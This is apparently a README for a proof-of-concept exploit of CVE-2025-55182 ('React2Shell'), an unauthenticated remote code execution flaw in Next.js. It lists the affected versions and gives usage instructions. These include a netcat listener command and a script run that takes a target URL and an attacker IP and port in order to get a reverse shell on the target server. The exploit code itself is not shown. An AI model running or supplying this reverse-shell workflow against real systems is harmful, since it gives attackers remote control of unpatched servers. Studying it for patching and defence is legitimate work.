Share
## https://sploitus.com/exploit?id=0222C593-2420-5F24-B8F6-AA4BF7BFC7FC
# React2Shell

Proof of Concept exploit for CVE-2025-55182 Unauthenticated Remote Code Execution vulnerability a.k.a React2Shell.
The script used to get shell on Next.js versions before;
- 15.0.4 and below
- 15.1.8 and below
- 15.2.5 and below
- 15.3.5 and below
- 15.4.7 and below
- 15.5.6 and below
- 16.0.6 and below
- 14.3.0-canary.77 and later releases

Its only tested on version 16.0.6.

## Usage
```
$ ./react2shell.py --help
d8888b. d88888b  .d8b.   .o88b. d888888b .d888b. .d8888. db   db d88888b db      db
88  `8D 88'     d8' `8b d8P  Y8 `~~88~~' VP  `8D 88'  YP 88   88 88'     88      88
88oobY' 88ooooo 88ooo88 8P         88       odD' `8bo.   88ooo88 88ooooo 88      88
88`8b   88~~~~~ 88~~~88 8b         88     .88'     `Y8b. 88~~~88 88~~~~~ 88      88
88 `88. 88.     88   88 Y8b  d8    88    j88.    db   8D 88   88 88.     88booo. 88booo.
88   YD Y88888P YP   YP  `Y88P'    YP    888888D `8888Y' YP   YP Y88888P Y88888P Y88888P

usage: react2shell [-h] -u URL -i IP -p PORT

options:
  -h, --help       show this help message and exit
  -u, --url URL    Target URL
  -i, --ip IP      Attacker IP
  -p, --port PORT  Attacker port

$ nc -lvp 4444 # start a listener
$ ./react2shell.py -u http://127.0.0.1:3000 -i 127.0.0.1 -p 4444
```

---
## References

- https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
- https://nvd.nist.gov/vuln/detail/CVE-2025-55182
- https://nextjs.org/blog/CVE-2025-66478
- https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components